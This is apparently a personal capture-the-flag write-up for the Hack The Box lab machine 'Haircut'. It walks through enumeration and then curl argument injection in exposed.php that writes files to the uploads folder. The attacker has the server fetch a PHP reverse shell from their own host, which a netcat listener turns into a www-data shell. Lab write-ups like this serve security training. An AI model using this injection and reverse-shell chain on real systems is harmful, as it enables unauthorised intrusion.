Haircut # ENUMERATION NMAP: - 22: OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 - 80: nginx 1.10.0 (Ubuntu) ================================================================ # ENUMERATION # FIRST REQUEST FOR 10.10.10.24 GET / HTTP/1.1 Host: 10.10.10.24 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 If-Modified-Since: Mon, 15 May 2017 10:33:52 GMT If-None-Match: W/"59198410-90" Cache-Control: max-age=0 - nothing to see here... HTTP/1.1 304 Not Modified Server: nginx/1.10.0 (Ubuntu) Date: Sat, 01 Aug 2020 01:51:49 GMT Last-Modified: Mon, 15 May 2017 10:33:52 GMT Connection: close ETag: "59198410-90" - return has nothing either... ================================================================ # ENUMERATION # GOBUSTER http://10.10.10.24:80/index.html (Status: 200) [Size: 144] http://10.10.10.24:80/uploads (Status: 301) [Size: 194] http://10.10.10.24:80/test.html (Status: 200) [Size: 223] http://10.10.10.24:80/hair.html (Status: 200) [Size: 141] http://10.10.10.24:80/exposed.php (Status: 200) [Size: 446] http://10.10.10.24/exposed.php Enter the Hairdresser's location you would like to check. Example: http://localhost/test.html [this was an area to enter an address...] Requesting Site... % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0 100 141 100 141 0 0 61679 0 --:--:-- --:--:-- --:--:-- 70500 - There's a picture of "CARRIE CURL" on the bottom... that clues in the tool curl. http://10.10.10.24/uploads/ 403 Forbidden nginx/1.10.0 (Ubuntu) ================================================================ - Changing the request in BurpSuite sent this... Requesting Site... % is not a good thing to put in a URL - Let's Curl with this box (exposed.php showed a picture of CARRIE CURL) - add an output argument -o winning.php Requesting Site... % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0Warning: Failed to create the file winning.php: Permission denied 100 223 100 223 0 0 44950 0 --:--:-- --:--:-- --:--:-- 55750 curl: (23) Failed writing body (0 != 223) - Permission Denied... what about the other directory (uploads)... - Yep, it worked... no errors encountered in the search box: http://localhost/test.php -o uploads/winning.php - Navigating to the new site worked... so can I put code in there? http://10.10.10.24/uploads/winning.php - What about checking my own IP address with this curl function? http://10.10.14.30/test.html curl: (7) Failed to connect to 10.10.14.30 port 80: Connection refused ================================================================ # ENUMERATION # SIMPLEHTTPSERVER - use the search box to request http://10.10.14.30/test.html Error response Error code 404. Message: File not found. Error code explanation: 404 = Nothing matches the given URI. - So it's reching out to my machine, and verified with the SimpleHTTPServer logs: Serving HTTP on 0.0.0.0 port 80 ... 10.10.10.24 - - [31/Jul/2020 22:16:48] code 404, message File not found 10.10.10.24 - - [31/Jul/2020 22:16:48] "GET /test.html HTTP/1.1" 404 - - Can we get a file to the server? - Created a reverse.php from: https://github.com/pentestmonkey/php-reverse-shell - Host it using python -m SimpleHTTPServer 80 - Use the search box to get the shell and move it to the uploads directory http://10.10.14.30/reverse.php -o uploads/reverse.php Requesting Site... % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0 100 5492 100 5492 0 0 37619 0 --:--:-- --:--:-- --:--:-- 37875 - Verified that the file was uploaded (logs from SimpleHTTPServer) Serving HTTP on 0.0.0.0 port 80 ... 10.10.10.24 - - [31/Jul/2020 22:23:40] "GET /reverse.php HTTP/1.1" 200 - ================================================================ # EXPLOIT # REQUEST THE PAGE - Set up a Netcat listener and visit the site... kali@kali:~/HTB/RETIRED/Haircut/uploads$ nc -nvlp 1337 listening on [any] 1337 ... connect to [10.10.14.30] from (UNKNOWN) [10.10.10.24] 52186 Linux haircut 4.4.0-78-generic #99-Ubuntu SMP Thu Apr 27 15:29:09 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux 04:28:56 up 46 min, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ FOOT-HOLD ACCOMPLISHED! - Tag this machine for future privilege escalation tasks... ================================================================